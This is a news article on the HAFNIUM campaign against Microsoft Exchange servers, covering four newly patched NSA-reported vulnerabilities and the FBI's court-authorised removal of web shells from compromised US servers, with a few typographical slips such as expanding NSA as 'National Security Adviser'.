Microsoft Exchange servers have been targeted by the HAFNIUM threat actors for the past month. In response to the spate of attacks , Microsoft issued out-of-band patches and warned users to apply the updates as soon as possible. However, it seems that the threat is not yet over after the National Security Adviser (NSA), along with Microsoft, patched four new vulnerabilities in the Exchange Server product.
Microsoft announced the latest patch when it as addressing several CVEs.19 patches, which were termed “critical.” This has taken the number of patches in the Exchange Server to 329 this year alone.
On a similar note, a court sitting in Houston has given the FBI the authority to remove backdoors from several Microsoft Exchange email servers in the US. This is coming a few months after threat actors exploited four previously discovered bugs to launch attacks on thousands of networks. According to the Justice Department, the operation to remove the backdoors was “successful.”
Last month, Microsoft said it discovered Hafnium, a new China state-sponsored hacking syndicate , exploiting exchange servers that were operated from company networks.
The four bugs were linked together, which enabled the threat actors to exploit the vulnerable exchange server and stole its contents. Although Microsoft provided patches to the vulnerabilities, the servers that have already been compromised by the hackers were still open to more exploitation by the hackers. After a few days, other threat actors started deploying malware by hitting vulnerable servers with the same flaws.
Staff Research Engineer at Tenable, Satnam Narang, stated that after ProxyLogon and other zero-days in Microsoft Exchange were exploited in the wild, four more vulnerabilities were patched.
“All four are credited to the National Security Agency, with two also being discovered by Microsoft internally,” Narang added.
Two of the bugs (CVE-2021-28481 and CVE-2021-28480) are pre-authentication, which means the threat actor can exploit them without authenticating to the vulnerable Exchange server.
He reiterated that threat actors have intensified interests in Exchange servers within the last month. As a result, organizations need to apply patches to the Exchange Server quickly to avoid an extended vulnerability exploit .
Both the FBI and the NSA have teamed up to provide information about the Exchange server exploits. The FBI has also warned about the alarming number of unpatched exchange servers, which threat actors have taken advantage of to exploit. The warrant patch granted to the FBI is a rare authorization. But the action is also not linked to the bugs the NSA identified yesterday.
The FBI filed its documents to the court, and it was reported that the affected Exchange servers were infected with web shells installed by the HAFNIUM threat actors. The FBI sought permission from the court because it stated that the owners of the affected services were not able to take the web shells down independently. As a result, swift action was necessary to protect other systems.
The FBI has pointed out that the operations were not about patching the Microsoft Exchange server vulnerabilities or remove any malware from the servers. The agency went on to advise network defenders to review the remediation guidance provided by Microsoft. They should also look at the Joint Advisory of March 10, 2021, to guide them on how to detect and patch their systems.
According to the warrant granted to the FBI, the web servers affect foreign and interstate communication or commerce, based on internet connection. The servers were impacted immensely and the web shells have affected the availability of information, systems, programs, and data on the servers.
According to the report, all the targeted systems were based in the Northern District of Georgia, Northern District of Iowa, Western District of Louisiana, District of Idaho, Southern District of Ohio, Northern District of Illinois, District of Massachusetts, and Southern District of Texas.